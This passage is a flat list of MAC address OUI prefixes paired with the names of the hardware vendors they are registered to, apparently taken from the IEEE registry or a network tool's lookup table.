Ltd. 002497 Cisco Systems, Inc 0023C5 Radiation Safety and Control Services Inc 0023C6 SMC Corporation 0023B9 Airbus Defence and Space Deutschland GmbH 0023BD Digital Ally, Inc. 0023BF Mainpine, Inc. 0023B2 Intelligent Mechatronic Systems Inc 0023B5 ORTANA LTD 002386 IMI Hydronic Engineering international SA 002383 InMage Systems Inc 002381 Lengda Technology(Xiamen) Co.,Ltd. 00237B WHDI LLC 002324 G-PRO COMPUTER 0023C9 Sichuan Tianyi Information Science & Technology Stock CO.,LTD 0023CE KITA DENSHI CORPORATION 0023CF CUMMINS-ALLISON CORP. 0023C2 SAMSUNG Electronics. Co. LTD 0023C4 Lux Lumen 0023E6 Innovation Farm, Inc. 0023E2 SEA Signalisation 0023E0 INO Therapeutics LLC 0023D5 WAREMA Renkhoff SE 0023FA RG Nets, Inc. 0023F2 TVLogic 0023E7 Hinke A/S 0023A9 Beijing Detianquan Electromechanical Equipment Co., Ltd 0023A7 Redpine Signals, Inc. 00239B Elster Solutions, LLC 002390 Algolware Corporation 002388 V.T. Telematica S.p.a. 00240A US Beverage Net 002407 TELEM SAS 00236A SmartRG Inc 002370 Snell 0022EA Rustelcom Inc. 0022F0 3 Greens Aviation Limited 0022EC IDEALBT TECHNOLOGY CORPORATION 0022DD Protecta Electronics Ltd 0022B9 Analogix Seminconductor, Inc 0022B8 Norcott 0022B7 GSS Grundig SAT-Systems GmbH 0022B3 Sei S.p.A. 00232F Advanced Card Systems Ltd. 002325 IOLAN Holding 002321 Avitech International Corp 002319 Sielox LLC 00235D Cisco Systems, Inc 00235C Aprius, Inc. 002352 DATASENSOR S.p.A. 002353 F E T Elettronica snc 002309 Janam Technologies LLC 002304 Cisco Systems, Inc 0022F9 Pollin Electronic GmbH 0022EE Algo Communication Products Ltd 002342 Coffee Equipment Company 002337 Global Star Solutions ULC 002331 Nintendo Co., Ltd. 002335 Linkflex Co.,Ltd 002311 Gloscom Co., Ltd. 0022C5 INFORSON Co,Ltd. 0022BF SieAmp Group of Companies 0022BE Cisco Systems, Inc 0022DB Translogic Corporation 0022DA ANATEK, LLC 002274 FamilyPhone AB 00226A Honeywell 002262 BEP Marine 002263 Koos Technical Services, Inc. 00226C LinkSprite Technologies, Inc. 00225C Multimedia & Communication Technology 00229B AverLogic Technologies, Inc. 00229C Verismo Networks Inc 00229A Lastar, Inc. 002284 DESAY A&V SCIENCE AND TECHNOLOGY CO.,LTD 002286 ASTRON 002282 8086 Consultancy 002276 Triple EYE B.V. 002254 Bigelow Aerospace 002257 3COM EUROPE LTD 002246 Evoc Intelligent Technology Co.,Ltd. 002248 Microsoft Corporation 002230 FutureLogic Inc. 00222E maintech GmbH 002228 Breeze Innovations Ltd. 002229 Compumedics Ltd 002290 Cisco Systems, Inc 00228A Teratronik elektronische systeme gmbh 00228E TV-NUMERIC 0022AB Shenzhen Turbosight Technology Ltd 002216 SHIBAURA VENDING MACHINE CORPORATION 0021C6 CSJ Global, Inc. 0021C3 CORNELL Communications, Inc. 0021C7 Russound 0021C1 ABB Oy / Medium Voltage Products 0021C0 Mobile Appliance, Inc. 0021BB Riken Keiki Co., Ltd. 0021B1 DIGITAL SOLUTIONS LTD 002214 RINNAI KOREA 00220B National Source Coding Center 00220C Cisco Systems, Inc 0021B0 Tyco Telecommunications 0021AD Nordic ID Oy 0021A3 Micromint 0021A5 ERLPhase Power Technologies Ltd. 00219D Adesys BV 00216F SymCom, Inc. 002166 NovAtel Inc. 002164 Special Design Bureau for Seismic Instrumentation 002160 Hidea Solutions Co. Ltd. 00217F Intraco Technology Pte Ltd 00217D PYXIS S.R.L. 0021EA Bystronic Laser AG 0021E1 Nortel Networks 0021FD LACROIX TRAFFIC S.A.U 002200 IBM Corp 002195 GWD Media Limited 002188 EMC Corporation 0021CD LiveTV 002116 Transcon Electronic Systems, spol. s r. o. 002115 PHYWE Systeme GmbH & Co. KG 002111 Uniphone Inc. 002114 Hylab Technology Inc. 001FD2 COMMTECH TECHNOLOGY MACAO COMMERCIAL OFFSHORE LTD. 001FBF Fulhua Microelectronics Corp. Taiwan Branch 001FBE Shenzhen Mopnet Industrial Co.,Ltd 001FC2 Jow Tong Technology Co Ltd 002152 General Satellite Research & Development Limited 002158 Style Flying Technology Co. 002148 Kaco Solar Korea 002141 RADLIVE 00213D Cermetek Microelectronics, Inc. 002140 EN Technologies Inc. 00213C AliphCom 001FDB Network Supply Corp., 001FD4 4IPNET, INC. 001FCB NIW Solutions 002132 Masterclock, Inc. 002131 Blynke Inc. 002129 Cisco-Linksys, LLC 001FF7 Nakajima All Precision Co., Ltd. 00211D Dataline AB 002120 Sequel Technologies 00211A LInTech Corporation 001FEB Trio Datacom Pty Ltd 001FE7 Simet 001F13 S.& A.S. Ltd. 001F10 TOLEDO DO BRASIL INDUSTRIA DE BALANCAS LTDA 001F0F Select Engineered Systems 001F25 MBS GmbH 001F27 Cisco Systems, Inc 001F26 Cisco Systems, Inc 001F1A Prominvest 001F18 Hakusan.Mfg.Co,.Ltd 001F9B POSBRO 001F97 BERTANA srl 001F8C CCS Inc. 001F68 Martinsson Elektronik AB 001F63 JSC Goodwin-Europa 001F69 Pingood Technology Co., Ltd. 001FB5 I/O Interconnect Inc. 001F42 Etherstack plc 001F35 AIR802 LLC 001F34 Lung Hwa Electronics Co., Ltd. 001F81 Accel Semiconductor Corp 001F83 Teleplan Technology Services Sdn Bhd 001F78 Blue Fox Porini Textile 001FAD Brown Innovations, Inc 001FA6 Stilo srl 001F4D Segnetics LLC 001EEF Cantronic International Limited 001EDE BYD COMPANY LIMITED 001EDD WASKO S.A. 001EDB Giken Trastem Co., Ltd. 001E87 Realease Limited 001E7F CBM of America 001E82 SanDisk Corporation 001ED1 Keyprocessor B.V. 001ED0 Ingespace 001ECD KYLAND Technology Co. LTD 001E6F Magna-Power Electronics, Inc. 001E6A Beijing Bluexon Technology Co.,Ltd 001E66 RESOL Elektronische Regelungen GmbH 001E63 Vibro-Meter SA 001EB1 Cryptsoft Pty Ltd 001EAF Ophir Optronics Ltd 001EAD Wingtech Group Limited 001F02 Pixelmetrix Corporation Pte Ltd 001EFE LEVEL s.r.o. 001EBF Haas Automation Inc. 001EBC WINTECH AUTOMATION CO.,LTD. 001EA1 Brunata a/s 001E8E Hunkeler AG 001EEB Talk-A-Phone Co. 001E28 Lumexis Corporation 001E24 Zhejiang Bell Technology Co.,ltd 001E20 Intertain Inc. 001E1C SWS Australia Pty Limited 001E12 Ecolab 001E16 Keytronix 001E32 Zensys 001E35 Nintendo Co., Ltd. 001E2B Radio Systems Design, Inc. 001DC5 Beijing Jiaxun Feihong Electricial Co., Ltd. 001DC6 SNR Inc. 001DBF Radiient Technologies, Inc. 001DB9 Wellspring Wireless 001DBB Dynamic System Electronics Corp. 001E53 Further Tech Co., LTD 001E4E DAKO EDV-Ingenieur- und Systemhaus GmbH 001E49 Cisco Systems, Inc 001E42 Teltonika 001E43 AISIN CORPORATION 001DB3 HPN Supply Chain 001DB1 Crescendo Networks 001DB4 KUMHO ENG CO.,LTD 001E08 Centec Networks Inc 001DFB NETCLEUS Systems Corporation 001DDB C-BEL Corporation 001DE6 Cisco Systems, Inc 001DE7 Marine Sonic Technology, Ltd. 001D3E SAKA TECHNO SCIENCE CO.,LTD 001D40 Intel – GE Care Innovations LLC 001D34 SYRIS Technology Corp 001D32 Longkay Communication & Technology (Shanghai) Co. Ltd 001D2A SHENZHEN BUL-TECH CO.,LTD. 001D2D Pylone, Inc. 001D90 EMCO Flow Systems 001D93 Modacom 001D94 Climax Technology Co., Ltd 001D8E Alereon, Inc. 001D5D Control Dynamics Pty. Ltd. 001D59 Mitra Energy & Infrastructure 001D57 CAETEC Messtechnik 001D51 Babcock & Wilcox Power Generation Group, Inc 001D2B Wuhan Pont Technology CO. , LTD 001D22 Foss Analytical A/S 001D23 SENSUS 001D1A OvisLink S.A. 001D4C Alcatel-Lucent 001D7B Ice Energy, Inc. 001D6C ClariPhy Communications, Inc. 001DA4 Hangzhou System Technology CO., LTD 001D9F MATT R.P.Traczynscy Sp.J. 001D84 Gateway, Inc. 001D85 Call Direct Cellular Solutions 001C7A Perfectone Netware Company Ltd 001C75 Segnet Ltd. 001C74 Syswan Technologies Inc. 001C68 Anhui Sun Create Electronics Co., Ltd 001CB7 USC DigiArk Corporation 001CB1 Cisco Systems, Inc 001CAF Plato Networks Inc. 001CAA Bellon Pty Ltd 001CE9 Galaxy Technology Limited 001CEA Scientific-Atlanta, Inc 001CE7 Rocon PLC Research Centre 001CE4 EleSy JSC 001CE2 Attero Tech, LLC. 001D02 Cybertech Telecom Development 001CFE Quartics Inc 001CD3 ZP Engineering SEL 001CCB Forth Corporation Public Company Limited 001CBC CastGrabber, LLC 001D0B Power Standards Lab 001CA0 Production Resource Group, LLC 001C98 LUCKY TECHNOLOGY (HK) COMPANY LIMITED 001C91 Gefen LLC 001C92 Tervela 001C8A Cirrascale Corporation 001C81 NextGen Venturi LTD 001CDB CARPOINT CO.,LTD 001CD5 ZeeVee, Inc. 001C10 Cisco-Linksys, LLC 001C02 Pano Logic 001C05 Nonin Medical Inc. 001C06 Siemens Numerical Control Ltd., Nanjing 001C04 Airgain, Inc. 001C01 ABB Oy Drives 001BFF Millennia Media inc. 001C30 Mode Lighting (UK ) Ltd. 001C2E HPN Supply Chain 001C2A Envisacor Technologies Inc. 001BF2 KWORLD COMPUTER CO., LTD 001BF0 Value Platforms Limited 001BEA Nintendo Co., Ltd. 001BE5 802automation Limited 001BE4 TOWNET SRL 001BD2 ULTRA-X ASIA PACIFIC Inc. 001BC4 Ultratec, Inc. 001BC2 Integrated Control Technology Limitied 001BBB RFTech Co.,Ltd 001BAA XenICs nv 001BC6 Strato Rechenzentrum AG 001C66 UCAMP CO.,LTD 001C1B Hyperstone GmbH 001C53 Synergy Lighting Controls 001C4D Aplix IP Holdings Corporation 001C38 Bio-Rad Laboratories, Inc. 001B14 Carex Lighting Equipment Factory 001B15 Voxtel, Inc. 001B09 Matrix Telecom Pvt. Ltd. 001B5D Vololink Pty Ltd 001B5A Apollo Imaging Technologies, Inc. 001B86 Bosch Access Systems GmbH 001B7C A & R Cambridge 001B1E HART Communication Foundation 001BA1 Åmic AB 001B96 General Sensing 001B8D Electronic Computer Systems, Inc. 001B56 Tehuti Networks Ltd. 001B4C Signtech 001AEA Radio Terminal Systems Pty Ltd 001ADD PePWave Ltd 001AD4 iPOX Technology Co., Ltd. 001AD6 JIAGNSU AETNA ELECTRIC CO.,LTD 001AD5 KMC CHAIN INDUSTRIAL CO., LTD. 001AD0 Albis Technologies AG 001AD3 Vamp Ltd. 001AD8 AlsterAero GmbH 001ADA Biz-2-Me Inc. 001ACB Autocom Products Ltd 001ACF C.T. ELETTRONICA 001AC3 Scientific-Atlanta, Inc 001ABF TRUMPF Laser Marking Systems AG 001AB8 Anseri Corporation 001AA3 DELORME 001A9B ADEC & Parter AG 001A9D Skipper Wireless, Inc. 001A8E 3Way Networks Ltd 001ABC U4EA Technologies Ltd 001B03 Action Technology (SZ) Co., Ltd 001AFB Joby Inc. 001AFD EVOLIS 001A85 NV Michel Van de Wiele 001A44 JWTrading Co., Ltd 001A49 Micro Vision Co.,LTD 001A3D Ajin Vision Co.,Ltd 001A41 INOCOVA Co.,Ltd 001A1C GT&T Engineering Pte Ltd 001A1F Coastal Environmental Systems 001A23 Ice Qube, Inc 001A1D PChome Online Inc. 001A17 Teak Technologies, Inc. 001A67 Infinite QL Sdn Bhd 001A64 IBM Corp 001A55 ACA-Digital Corporation 001A6F MI.TEL s.r.l. 001A71 Diostech Co., Ltd. 001A69 Wuhan Yangtze Optical Technology CO.,Ltd. 001A33 ASI Communications, Inc. 001A05 OPTIBASE LTD 0019FC PT. Ufoakses Sukses Luarbiasa 001A0A Adaptive Micro-Ware Inc. 001A51 Alfred Mann Foundation 0019E6 TOYO MEDIC CO.,LTD. 0019E8 Cisco Systems, Inc 0019DF Thomson Inc. 0019DD FEI-Zyfer, Inc. 0019D4 ICX Technologies 0019CF SALICRU, S.A. 0019B2 XYnetsoft Co.,Ltd 0019A4 Austar Technology (hang zhou) Co.,Ltd 0019AA Cisco Systems, Inc 001967 TELDAT Sp.J. 001971 Guangzhou Unicomp Technology Co.,Ltd 001964 Doorking Inc. 001976 Xipher Technologies, LLC 00196C ETROVISION TECHNOLOGY 0019B1 Arrow7 Corporation 001996 TurboChef Technologies Inc. 0019B3 Stanford Research Systems 001997 Soft Device Sdn Bhd 001998 SATO CORPORATION 00199C CTRING 00198B Novera Optics Korea, Inc. 001949 TENTEL COMTECH CO., LTD. 001946 Cianet Industria e Comercio S/A 001944 Fossil Partners, L.P. 001942 ON SOFTWARE INTERNATIONAL LIMITED 00193F RDI technology(Shenzhen) Co.,LTD 001941 Pitney Bowes, Inc 001919 ASTEL Inc. 001908 Duaxes Corporation 00190C Encore Electronics, Inc. 0018DB EPL Technology Ltd 0018D6 Swirlnet A/S 0018CD Erae Electronics Industry Co., Ltd 001961 Blaupunkt Embedded Systems GmbH 001952 ACOGITO Co., Ltd 0018FD Optimal Technologies International Inc. 0018F0 JOYTOTO Co., Ltd. 0018E9 Numata Corporation 00192D Nokia Corporation 001930 Cisco Systems, Inc 0018EF Escape Communications, Inc. 0018E6 Computer Hardware Design SIA 0018F7 Kameleon Technologies 001927 ImCoSys Ltd 00188A Infinova LLC 001885 Motorola Solutions Inc. 001888 GOTIVE a.s. 001886 EL-TECH, INC. 001887 Metasystem SpA 001849 nVent, Schroff GmbH 001846 Crypto S.A. 001845 Pulsar-Telecom LLC. 00183D Vertex Link Corporation 0018A3 ZIPPY TECHNOLOGY CORP. 001893 SHENZHEN PHOTON BROADBAND TECHNOLOGY CO.,LTD 0018A0 Cierma Ascenseurs 00189D Navcast Inc. 0018C8 ISONAS Inc. 0018BE ANSA Corporation 0018BA Cisco Systems, Inc 0018B4 Dawon Media Inc. 0018B6 S3C, Inc. 0018B1 IBM Corp 001825 Private 001824 Kimaldi Electronics, S.L. 00185A uControl, Inc. 001852 StorLink Semiconductors, Inc. 001850 Secfone Kft 001858 TagMaster AB 001863 Veritech Electronics Limited 00187B 4NSYS Co. Ltd. 00187E RGB Spectrum 001879 dSys 0017CE Screen Service Spa 0017CD CEC Wireless R&D Ltd. 0017D0 Opticom Communications, LLC 0017C6 Cross Match Technologies Inc 0017C3 KTF Technologies Inc. 00178A DARTS TECHNOLOGIES CORP. 001787 Brother, Brother & Sons ApS 001789 Zenitron Corporation 001803 ArcSoft Shanghai Co. LTD 0017EF IBM Corp 0017F5 LIG NEOPTEK 0017FE TALOS SYSTEM INC. 0017F8 Motech Industries Inc. 001798 Azonic Technology Co., LTD 00178F NINGBO YIDONG ELECTRONIC CO.,LTD. 0017DB CANKO TECHNOLOGIES INC. 0017D6 Bluechips Microhouse Co.,Ltd. 0017AB Nintendo Co., Ltd. 001807 Fanstel Corp. 001808 SightLogix, Inc. 0017B7 Tonze Technology Co. 00181E GDX Technologies Ltd. 0016F3 CAST Information Co., Ltd 0016F5 Dalian Golden Hualu Digital Technology Co.,Ltd 0016F1 OmniSense, LLC 0016F4 Eidicom Co., Ltd. 0016E7 Dynamix Promotions Limited 001726 m2c Electronic Technology Ltd. 001721 FITRE S.p.A. 001720 Image Sensing Systems, Inc. 001760 Naito Densei Machida MFG.CO.,LTD 001761 Private 001768 Zinwave Ltd 001769 Cymphonix Corp 001762 Solar Technology, Inc. 00171A Winegard Company 00171C NT MicroSystems, Inc. 001716 Qno Technology Inc. 001772 ASTRO Strobel Kommunikationssysteme GmbH 00177A ASSA ABLOY AB 001734 ADC Telecommunications 00172E FXC Inc. 00172B Global Technologies Inc. 00173E LeucotronEquipamentos Ltda. 00170A INEW DIGITAL COMPANY 0016F9 CETRTA POT, d.o.o., Kranj 001747 Trimble 0016C0 Semtech Corporation 0016C2 Avtec Systems Inc 0016BA WEATHERNEWS INC. 0016B2 DriveCam Inc 0016B3 Photonicbridges (China) Co., Ltd. 0016AD BT-Links Company Limited 0016E5 FORDLEY DEVELOPMENT LIMITED 0016E6 GIGA-BYTE TECHNOLOGY CO.,LTD. 0016DD Gigabeam Corporation 00169A Quadrics Ltd 001692 Scientific-Atlanta, Inc. 001691 Moser-Baer AG 001688 ServerEngines LLC 00168B Paralan Corporation 0016AF Shenzhen Union Networks Equipment Co.,Ltd. 00169E TV One Ltd 00169F Vimtron Electronics Co., Ltd. 00166E Arbitron Inc. 00166A TPS 001663 KBT Mobile 001654 Flex-P Industries Sdn. Bhd. 001656 Nintendo Co., Ltd. 001651 Exeo Systems 00164B Quorion Data Systems GmbH 0016C8 Cisco Systems, Inc 0016C4 SiRF Technology, Inc. 0016BD ATI Industrial Automation 001682 OMS Motion 00162A Antik computers & communications s.r.o. 001629 Nivus GmbH 001621 Colorado Vnet 00161A Dametric AB 001606 Ideal Industries 001607 Curves International Inc. 00160A SWEEX Europe BV 001602 CEYON TECHNOLOGY CO.,LTD. 001600 CelleBrite Mobile Synchronization 0015F4 Eventide 0015ED Fulcrum Microsystems, Inc. 0015F0 EGO BV 0015EE Omnex Control Systems 001615 Nittan Company, Limited 001617 MSI 001610 Carina Technology 001631 Xteam 00162E Space Shuttle Hi-Tech Co., Ltd. 0015C0 DIGITAL TELEMEDIA CO.,LTD. 0015C2 3M Germany 0015B2 Advanced Industrial Computer, Inc. 0015DA IRITEL A.D. 0015C8 FlexiPanel Ltd 00154A WANSHIH ELECTRONIC CO., LTD 00154C Saunders Electronics 00154D Netronome Systems, Inc. 001549 Dixtal Biomedica Ind. Com. Ltda 0015A5 DCI Co., Ltd. 001594 BIXOLON CO.,LTD 001590 Hectronic GmbH 00158C Liab ApS 00158F NTT Advanced Technology Corporation 001539 Technodrive srl 001531 KOCOM 001535 OTE Spa 001536 Powertech co.,Ltd 00152B Cisco Systems, Inc 00152C Cisco Systems, Inc 001528 Beacon Medical Products LLC d.b.a. BeaconMedaes 001527 Balboa Instruments 001521 Horoquartz 001520 Radiocrafts AS 00151C LENECO 001519 StoreAge Networking Technologies 001583 IVT corporation 001588 Salutica Allied Solutions Sdn Bhd 001585 Aonvision Technolopy Corp. 001579 Lunatone Industrielle Elektronik GmbH 001511 Data Center Systems 00150E OPENBRAIN TECHNOLOGIES CO., LTD. 00150D Hoana Medical, Inc. 001506 Neo Photonics 001547 AiZen Solutions Inc. 00153D ELIM PRODUCT CO. 001544 coM.s.a.t. AG 00156B Perfisans Networks Corp. 001566 A-First Technology Co., Ltd. 001489 B15402100 - JANDEI, S.L. 001480 Hitachi-LG Data Storage Korea, Inc 00147E InnerWireless 00147D Aeon Digital International 001476 MultiCom Industries Limited 0014BE Wink communication technology CO.LTD 0014BA Carvers SA de CV 0014B6 Enswer Technology Inc. 0014D7 Datastore Technology Corp 0014DD Covergence Inc. 0014D4 K Technology Corporation 0014CF INVISIO Communications 001504 GAME PLUS CO., LTD. 001505 Actiontec Electronics, Inc 0014FE Artech Electronics 0014B2 mCubelogics Corporation 0014AE Wizlogics Co., Ltd. 0014A6 Teranetics, Inc. 0014AA Ashly Audio, Inc. 0014E6 AIM Infrarotmodule GmbH 0014DE Sage Instruments Inc. 0014DF HI-P Tech Corporation 001473 Bookham Inc 00146E H. Stoll GmbH & Co. KG 001469 Cisco Systems, Inc 00148A Elin Ebg Traction Gmbh 0014F3 ViXS Systems Inc 00140B FIRST INTERNATIONAL COMPUTER, INC. 0013FD Nokia Danmark A/S 001400 MINERVA KOREA CO., LTD 0013FC SiCortex, Inc 0013F6 Cintech 0013F3 Giga-byte Communications Inc. 0013DA Diskware Co., Ltd 0013D8 Princeton Instruments 0013CB Zenitel Norway AS 00144F Oracle Corporation 001456 Edge Products 001450 Heim Systems GmbH 001452 CALCULEX,INC. 001442 ATTO CORPORATION 001447 BOAZ Inc. 00143E AirLink Communications, Inc. 00143B Sensovation AG 0013CF 4Access Communications 0013C9 Beyond Achieve Enterprises Ltd. 0013C6 OpenGear, Inc 0013BE Virtual Conexions 00145D WJ Communications, Inc. 001414 Jumpnode Systems LLC. 001409 MAGNETI MARELLI S.E. S.p.A. 00142D Toradex AG 001429 V Center Technologies Co., Ltd. 00141E P.A. Semi, Inc. 0013F4 Psitek (Pty) Ltd 0013E9 VeriWave, Inc. 001367 Narayon. Co., Ltd. 00135C OnSite Systems, Inc. 00135F Cisco Systems, Inc 001356 FLIR Radiation Inc 00135A Project T&E Limited 001361 Biospace Co., Ltd. 001362 ShinHeung Precision Co., Ltd. 00134F Rapidus Wireless Networks Inc. 001326 ECM Systems Ltd 001327 Data Acquisitions limited 00131D Scanvaegt International A/S 001318 DGSTATION Co., Ltd. 00131A Cisco Systems, Inc 00130C HF System Corporation 001378 Qsan Technology, Inc. 00137A Netvox Technology Co., Ltd. 001381 CHIPS & Systems, Inc. 00133B Speed Dragon Multimedia Limited 001338 FRESENIUS-VIAL 00132D iWise Communications 00132C MAZ Brandenburg GmbH 001324 Schneider Electric Ultra Terminal 001379 PONDER INFORMATION INDUSTRIES LTD. 001374 Atheros Communications, Inc. 001369 Honda Electron Co., LED. 0013B9 BM SPA 0013AB Telemotive AG 0013AC Sunmyung Electronics Co., LTD 0013A8 Tanisys Technology 00130F EGEMEN Bilgisayar Muh San ve Tic LTD STI 001313 GuangZhou Post & Telecom Equipment ltd 0012F8 WNI Resources, LLC 001342 Vision Research, Inc. 001399 STAC Corporation. 001395 congatec GmbH 0012CA Mechatronic Brick Aps 0012C7 SECURAY Technologies Ltd.Co. 0012CD ASEM SpA 0012C0 HotLava Systems, Inc. 0012B7 PTW Freiburg 0012BC Echolab LLC 0012BD Avantec Manufacturing Limited 0012E8 Fraunhofer IMS 0012E0 Codan Limited 0012DD Shengqu Information Technology (Shanghai) Co., Ltd. 0012DE Radio Components Sweden AB 00127C SWEGON AB 001278 International Bar Code 00127A Sanyu Industry Co.,Ltd. 001301 IronGate S.L. 0012F6 MDK CO.,LTD. 0012F4 Belco International Co.,Ltd. 0012F1 IFOTEC 0012F5 Imarda New Zealand Limited 0012CB CSS Inc. 0012CE Advanced Cybernetics Group 001272 Redux Communications Ltd. 00126A OPTOELECTRONICS Co., Ltd. 001268 IPS d.o.o. 0012AB WiLife, Inc. 0012AC ONTIMETEK INC. 001298 MICO ELECTRIC(SHENZHEN) LIMITED 0012A1 BluePacket Communications Co., Ltd. 00129B E2S Electronic Engineering Solutions, S.L. 001221 B.Braun Melsungen AG 001212 PLUS Corporation 001213 Metrohm AG 001218 ARUZE Corporation 001206 iQuest (NZ) Ltd 001207 Head Strong International Limited 001209 Fastrax Ltd 00120B Chinasys Technologies Limited 001205 Terrasat Communications, Inc. 001266 Swisscom Hospitality Services SA 00125E CAEN 00125D CyberNet Inc. 001254 Spectra Technologies Holdings Company Ltd 00123C Second Rule LLC 001238 SetaBox Technology Co., Ltd. 00123E ERUNE technology Co., Ltd. 00123A Posystech Inc., Co. 001234 Camille Bauer 0011E3 Thomson, Inc. 0011DC Glunz & Jensen 00124F nVent 001249 Delta Elettronica S.p.A. 00124D Inducon BV 001223 Pixim 0011F7 Shenzhen Forward Industry Co., Ltd 0011D3 NextGenTel Holding ASA 001145 ValuePoint Networks 00113C Micronas GmbH 001190 Digital Design Corporation 001196 Actuality Systems, Inc. 001187 Category Solutions, Inc 001131 UNATECH. CO.,LTD 001127 TASI, Inc 00112A Niko NV 00112B NetModule AG 00112D iPulse Systems 001154 Webpro Technologies Inc. 001151 Mykotronx 00114E 690885 Ontario Inc. 00117B Büchi Labortechnik AG 00116F Netforyou Co., LTD. 001171 DEXTER Communications, Inc. 001167 Integrated System Solution Corp. 00116D American Time and Signal 001160 ARTDIO Company Co., LTD 0011A5 Fortuna Electronic Corp. 0011C4 Terminales de Telecomunicacion Terrestre, S.L. 0011CB Jacobsons AB 0011AB TRUSTABLE TECHNOLOGY CO.,LTD. 000FEE XTec, Incorporated 000FE4 Pantech Co.,Ltd 000FE7 Lutron Electronics Co., Inc. 000FE6 MBTech Systems, Inc. 000FE9 GW TECHNOLOGIES CO.,LTD. 000FE1 ID DIGITAL CORPORATION 000FDF SOLOMON Technology Corp. 000FC7 Dionica R&D Ltd. 000FC8 Chantry Networks 000FBB Nokia Siemens Networks GmbH & Co. KG. 000FBC Onkey Technologies, Inc. 000FB6 Europlex Technologies 000FB9 Adaptive Instruments 000FAB Kyushu Electronics Systems Inc. 000FAD FMN communications GmbH 000FAC IEEE 802.11 000FB3 Actiontec Electronics, Inc 000F9C Panduit Corp 001115 EPIN Technologies, Inc. 00110B Franklin Technology Systems 001105 Sunplus Technology Co., Ltd. 001102 Aurora Multimedia Corp. 000FFE G-PRO COMPUTER 000FDA YAZAKI CORPORATION 000FEF Thales e-Transactions GmbH 000F98 Avamax Co. Ltd. 000F97 Avanex Corporation 000F96 Telco Systems, Inc. 001123 Appointech, Inc. 00110F netplat,Inc. 000FD6 Sarotech Co., Ltd 000F8B Orion MultiSystems Inc 000F8C Gigawavetech Pte Ltd 000F72 Sandburst 000F75 First Silicon Solutions 000F7C ACTi Corporation 000F7A BeiJing NuQX Technology CO.,LTD 000F64 D&R Electronica Weesp BV 000F45 Stretch, Inc. 000F3B Fuji System Machines Co., Ltd. 000F37 Xambala Incorporated 000F38 Netstar 000F3A HISHARP 000F34 Cisco Systems, Inc 000F30 Raza Microelectronics Inc 000F2E Megapower International Corp. 000F26 WorldAccxx LLC 000F25 AimValley B.V. 000F54 Entrelogic Corporation 000F53 Solarflare Communications Inc. 000F51 Azul Systems, Inc. 000F07 Mangrove Systems, Inc. 000F00 Legra Systems, Inc. 000F01 DIGITALKS INC 000F03 COM&C CO., LTD 000EDF PLX Technology 000EE1 ExtremeSpeed Inc. 000ED3 Epicenter, Inc. 000ED7 Cisco Systems, Inc 000F19 Boston Scientific 000F10 RDM Corporation 000EBA HANMI SEMICONDUCTOR CO., LTD. 000EBC Paragon Fidelity GmbH 000EA8 United Technologists Europe Limited 000E8B Astarte Technology Co, Ltd. 000E80 Thomson Technology Inc 000E85 Catalyst Enterprises, Inc. 000E74 Solar Telecom. Tech 000E47 NCI System Co.,Ltd. 000E46 Niigata Seimitsu Co.,Ltd. 000E43 G-Tek Electronics Sdn. Bhd. 000EAA Scalent Systems, Inc. 000EAC MINTRON ENTERPRISE CO., LTD. 000EAE GAWELL TECHNOLOGIES CORP. 000EA4 Quantum Corp. 000E9D Tiscali UK Ltd 000E67 Eltis Microelectronics Ltd. 000E65 TransCore 000E5F activ-net GmbH & Co. KG 000E57 Iworld Networking, Inc. 000E7A GemWon Communications Co., Ltd. 000E6C Device Drivers Limited 000E6B Janitza electronics GmbH 000EC5 Digital Multitools Inc 000EC7 Motorola Korea 000E44 Digital 5, Inc. 000E32 Kontron Medical 000DA7 Private 000DAD Dataprobe, Inc. 000DA9 INGETEAM 000DAB Parker Hannifin GmbH Electromechanical Division Europe 000DA8 Teletronics Technology Corporation 000D9E TOKUDEN OHIZUMI SEISAKUSYO Co.,Ltd. 000DA3 Emerging Technologies Limited 000DA4 DOSCH & AMAND SYSTEMS AG 000D9A INFOTEC LTD 000DC0 Spagat AS 000DC6 DigiRose Technology Co., Ltd. 000DC1 SafeWeb Inc 000DBA Océ Document Technologies GmbH 000DBD Cisco Systems, Inc 000DB5 GLOBALSAT TECHNOLOGY CORPORATION 000DB4 Stormshield 000DAF Plexus Corp (UK) Ltd 000DB1 Japan Network Service Co., Ltd. 000DF8 ORGA Kartensysteme GmbH 000DF5 Teletronics International Inc. 000DF7 Space Dynamics Lab 000DEB CompXs Limited 000DEE Andrew RF Power Amplifier Group 000DEF Soc. Coop. Bilanciai 000DE7 Snap-on OEM Group 000E0B Netac Technology Co., Ltd. 000E11 BDT Büro und Datentechnik GmbH & Co.KG 000DF0 QCOM TECHNOLOGY INC. 000DE5 Samsung Thales 000DDD Profilo Telra Elektronik Sanayi ve Ticaret. A.Ş 000E1F TCL Networks Equipment Co., Ltd. 000E26 Gincom Technology Corp. 000E16 SouthWing S.L. 000D97 ABB Inc./Tropos 000D96 Vtera Technology Inc. 000D8B T&D Corporation 000D90 Factum Electronics AB 000D78 Engineering & Security 000D79 Dynamic Solutions Co,.Ltd. 000D6D K-Tech Devices Corp. 000D6E K-Patents Oy 000D6A Redwood Technologies LTD 000D09 Yuehua(Zhuhai) Electronic CO. LTD 000D02 NEC Platforms, Ltd. 000D07 Calrec Audio Ltd 000D85 Tapwave, Inc. 000D82 PHSNET 000D83 Sanmina-SCI Hungary Ltd. 000D7F MIDAS COMMUNICATION TECHNOLOGIES PTE LTD ( Foreign Branch) 000D75 Kobian Pte Ltd - Taiwan Branch 000D21 WISCORE Inc. 000D23 Smart Solution, Inc 000D27 MICROPLEX Printware AG 000D1B Kyoto Electronics Manufacturing Co., Ltd. 000D1D HIGH-TEK HARNESS ENT. CO., LTD. 000D40 Verint Loronix Video Solutions 000D37 WIPLUG 000D33 Prediwave Corp. 000D2F AIN Comm.Tech.Co., LTD 000D5D Raritan Computer, Inc 000D63 DENT Instruments, Inc. 000D66 Cisco Systems, Inc 000CFB Korea Network Systems 000CF5 InfoExpress 000CEE jp-embedded 000CE9 BLOOMBERG L.P. 000CEA aphona Kommunikationssysteme 000CDA FreeHand Systems, Inc. 000C85 Cisco Systems, Inc 000C84 Eazix, Inc. 000C7A DaTARIUS Technologies GmbH 000C79 Extel Communications P/L 000C75 Oriental integrated electronics. LTD 000C9D UbeeAirWalk, Inc. 000C9F NKE Corporation 000C9A Hitech Electronics Corp. 000C6D Edwards Ltd. 000C70 ACC GmbH 000C6A MBARI 000C6B Kurz Industrie-Elektronik GmbH 000CCB Design Combus Ltd 000CC9 ILWOO DATA & TECHNOLOGY CO.,LTD 000CAF TRI TERM CO.,LTD. 000CB3 ROUND Co.,Ltd. 000C91 Riverhead Networks 